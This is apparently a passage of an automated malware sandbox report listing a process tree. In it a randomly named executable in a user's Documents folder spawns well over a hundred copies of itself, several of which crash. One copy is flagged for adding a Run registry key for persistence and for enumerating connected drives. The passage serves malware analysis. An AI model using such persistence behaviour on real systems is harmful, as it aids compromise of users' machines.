C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4484
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8536
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8816
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9068
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9164
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8440
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8968
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8752
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8088
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9756
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9984
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10228
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9680
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10788
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10520
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7876
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1144
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7264
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4900
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11668
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4072
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7440
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9688
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12216
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10952
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8720
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8332
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1436
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11580
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10448
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10996
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10572
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9848
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4764
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12584
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12952
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:13300
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1260
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:13268
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10276
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:13132
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7284
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9388
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9900
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11920
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4948
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9300
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4728
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9304
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9772
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9644
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:13108
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5568
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5532
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11244
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11036
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8812
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5576
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8296
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6364
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2968
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11872
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10680 -s 284⤵
- Program crash
PID:11460
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8484
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8864
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11256
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8844
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11656
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8736 -s 284⤵
- Program crash
PID:9000
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3040
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7180
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10772
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8664
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11136
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9436
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6280
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5776
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8500
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10960
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10652
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8248
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12524
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10108
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12824
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11968
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7740
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10844
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10704
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3124
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10252
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:13060
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10400
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10060
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11736
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8280
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12040
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7152
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10112
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6412
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9556
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6776
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7000
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10956
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10364
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2092
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8424
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9060
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5664
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8204
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9316
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12012
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7964
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4136
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8352
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵
- Adds Run key to start application
- Enumerates connected drives
PID:4768
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9124
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5740
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9612
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11344
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9352
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12480
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6196
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2584
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10416
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12180
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5972
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3988
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2544
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11620
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8164
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9744
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9376
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7756
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9764
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4200
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10048
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1332
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9536
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:13124
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9856
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11540
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 1644⤵
- Program crash
PID:3180
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8096
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12000
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:7760
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9360
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8336
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2736
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10012
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9600
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:5620
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6472
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10368
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 1644⤵
- Program crash
PID:11516
-
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:1476
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:6912
-
-
